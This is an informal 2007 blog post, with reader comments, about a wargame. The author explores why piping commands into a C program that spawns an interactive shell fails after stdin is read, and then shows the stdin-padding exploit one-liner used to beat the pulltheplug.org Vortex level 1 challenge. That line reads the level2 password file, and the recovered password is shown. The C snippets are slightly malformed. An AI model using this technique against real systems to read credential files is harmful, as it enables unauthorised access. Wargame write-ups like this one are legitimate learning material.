ok this is whacked!
the concepts presented, i guess are common knowledge… but the answers elude me somehow. (and listening to Metallica Music doesn’t help for some reason.)
f*ck!
consider the following:
/* shitprog.c */ #include#include int main(t, c) { execlp("/bin/sh", "sh", "-i", NULL) return 0; }
fairly easy to figure out you don’t you agree?
now for some output:
misha@heaven ~ $ ./shitprog sh-3.00$
as expected. we have a shell! next, let’s try passing commands to the shell via stdin.
misha@heaven ~ $ echo "whoami" | ./shitprog sh-3.00$ misha sh-3.00$ exit
still working as expected so far…
to further build my case, let’s try messing with stdin before calling execlp() shall we? (i used getchar())
/* anothershitprog.c */ #include#include int main(t, c) { getchar(); execlp("/bin/sh", "sh", "-i", NULL) return 0; }
again, let’s try running it.
misha@heaven ~ $ ./anothershitprog f sh-3.00$
this time, the program waits for me to press a key then the execlp() resolves…
so how about a command via stdin like what we did before?
misha@heaven ~ $ echo "whoami" | ./anothershitprog sh-3.00$ exit
what the fuck!? it just exits!
i finally solved the problem by writing a 4096 byte garbage immediately preceeding my “command”, like so:
misha@heaven ~ $ echo $(perl -e 'print "a"x4096, "whoami"') | ./anothershitprog sh-3.00$ misha sh-3.00$ exit
i tried this same method in pulltheplug.org’s level 2 vortex challenge , but was not as succesfull. the “pad to 4096″ trick doesn’t work.
luckily… the number of “/” infront of a command doesn’t make any difference. so /bin/ls is the same as ///////////bin/ls.
so this is how my session went:
level1@vortex ~ $ echo $(perl -e 'print "\\"x257,"\xca","/"x3838, "bin/cat /etc/pass/level2"') | /levels/level1 sh-3.1$ 23anbT\rE sh-3.1$ exit
that’s how i got the pass for level 2.
anyone care to fill me in with the gray areas? it’s 12:38 am and i’m totally wasted.
Hi.
How did you discovered that: “i finally solved the problem by writing a 4096 byte garbage immediately preceeding my “command”,” ? I’m really curious why it is working…
Comment by cyfran — July 30, 2007 @ 10:57 pm
Hi there cyfran… sadly, i can’t really remember how i got that value… =( for now, i can only say that i started out with just trial and error…
it didn’t work when i tried that value on the vortex challenge though..)
Comment by sleepy jenkins — July 31, 2007 @ 7:38 am
Thanks for response! Maybe someday I’ll figure out that (if somebody will do before me, please left here message).
Comment by cyfran — July 31, 2007 @ 4:55 pm
i’ll try doing this exercise again when i find time. real life has been too much of an attention hog these days …
Comment by sleepy jenkins — August 2, 2007 @ 8:52 am
i’ll try doing this exercise again when i find time. real life has been too much of an attention hog these days …
Comment by sleepy jenkins — August 2, 2007 @ 8:52 am